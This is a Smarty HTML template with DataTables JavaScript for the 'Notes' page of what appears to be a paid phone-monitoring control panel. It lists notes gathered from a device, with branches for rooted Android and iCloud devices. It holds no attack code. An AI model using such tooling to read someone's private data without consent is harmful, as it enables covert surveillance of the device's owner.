<style type="text/css">
    @media (max-width: 767px) {
        .daterangepickerWrapper {
            margin-top: 10px;
        }
    }

    .nav.nav-pills {
        margin-top: 10px;
    }
</style>
<div>
    <h1 class="text-center">{$title}</h1>

    {insert "inc.cp.messages.htm"}

    {if $di.deviceModules->getModuleErrorCode('notes') == 109 && count($accountsList)}
        {include "content/{$di.t->getLocale()}/warning/noDataServer.html"}
    {/if}
    
    {if !$paid}
        {insert "cp/updatePackage.html"}
    {elseif count($accountsList)}
        <div class="row form-inline">
            <div class="col-lg-6 col-md-6 col-sm-6">
                <div class="form-group">
                    <label for="account">{$di.t->_('Account')}</label>
                    {include "scripts/select.htm" name="account" id="account" class="form-control" keys=$accountsList values=$accountsList}
                </div>
            </div>
            <div class="col-lg-6 col-md-6 col-sm-6">
                <div class="daterangepickerWrapper">
                    <div id="reportrange" class="btn btn-default pull-right">
                        <i class="fa fa-calendar fa-lg"></i>
                        <span></span>
                        <b class="caret"></b>
                    </div>
                </div>
            </div>
        </div>

    <div class="table-container dialogs-table">
        <table class="dataTable" id="datatable" aria-describedby="datatables_info">
            <thead>
                <tr role="row">
                    <th>{$di.t->_('Date')}</th>
                    <th>{$di.t->_('Title')}</th>
                </tr>
            </thead>
        </table>
    </div>
    <script>
        $(document).ready(function() {
            var notes = {
                startDate: -1,
                endDate: -1,
                table: null,
                getRangeUrl: function(start, end) {
                    if (start === null && end === null) {
                        this.startDate = this.endDate = -1;
                    } else if (start && end) {
                        this.startDate = moment(start).unix();
                        this.endDate = moment(end).unix();
                    }
                    
                    var url = '{$di.config.domain}/cp/notes?';

                    return url + $.param({
                        account: $('#account').val(),
                        timeFrom: this.startDate,
                        timeTo: this.endDate
                    });
                },
                initTable: function() {
                    var table = $('#datatable').dataTable({
                        bProcessing: true,
                        bServerSide: true,
                        sAjaxSource: this.getRangeUrl(),
                        bPaginate: true,
                        bFilter: false,
                        bSort: true,
                        bInfo: true,
                        bAutoWidth: false,
                        bSortMulti: false,
                        iDisplayLength: {$authData.records_per_page},
                        aaSorting: [[0, 'desc']],
                        oLanguage: {
                            sUrl: '{$di.config.staticDomain}/datatables/language/{$di.t->getLocale()}.txt'
                        },
                        aoColumns: [
                            {
                                mData: null,
                                sWidth: '180px',
                                fnRender: function(obj) {
                                    return moment(obj.aData[0] * 1000){if isset($customUtcOffset)}.zone({$customUtcOffset}){/if}.format('lll');
                                }
                            },
                            {
                                fnRender: function(obj) {
                                    return _.escape(obj.aData[1]);
                                }
                            }
                        ],
                        fnRowCallback: function(nRow, data) {
                            $(nRow).on('click', function() {
                                window.location = '{$di.router->getRouteUrl("notes")}/' + encodeURIComponent($('#account').val()) + '/' + encodeURIComponent(data[0]);
                            });
                        },
                        fnDrawCallback: function() {
                            notes.table = table;
                            $(this).find('tbody').tableScroll();
                        }
                    });
                },
                reloadTable: function(url) {
                    this.table.fnReloadAjax(url);
                }
            };

            notes.initTable();

            $('#account').change(function() {
                notes.reloadTable(notes.getRangeUrl());
            });

            $('#reportrange').timeRange(function(from, to) {
                notes.reloadTable(notes.getRangeUrl(from, to));
            });
        });
    </script>
    {else}
        {if $di.currentDevice.os=='android' && !$di.currentDevice.rooted}
            {include "content/{$di.t->getLocale()}/rootPhone.html"}
        {elseif $di.currentDevice.os=='android' && $di.currentDevice.app_version > 6 && $di.currentDevice.rooted && !$di.currentDevice.rootAccess}   
            {include "content/{$di.t->getLocale()}/rootAccessPhone.html"}    
        {else}
            {include "content/{$di.t->getLocale()}/noDataTitle.html"
                moduleName = $di.t->_('Notes')
            }
            {if $di.currentDevice.os=='icloud'}
                {include "content/{$di.t->getLocale()}/noDataICloud.html"
                moduleId = 'notes'
                moduleName = $di.t->_('Notes')
                }
            {else}
                {include "content/{$di.t->getLocale()}/noData.html"}
            {/if}
        {/if}
    {/if}
</div>
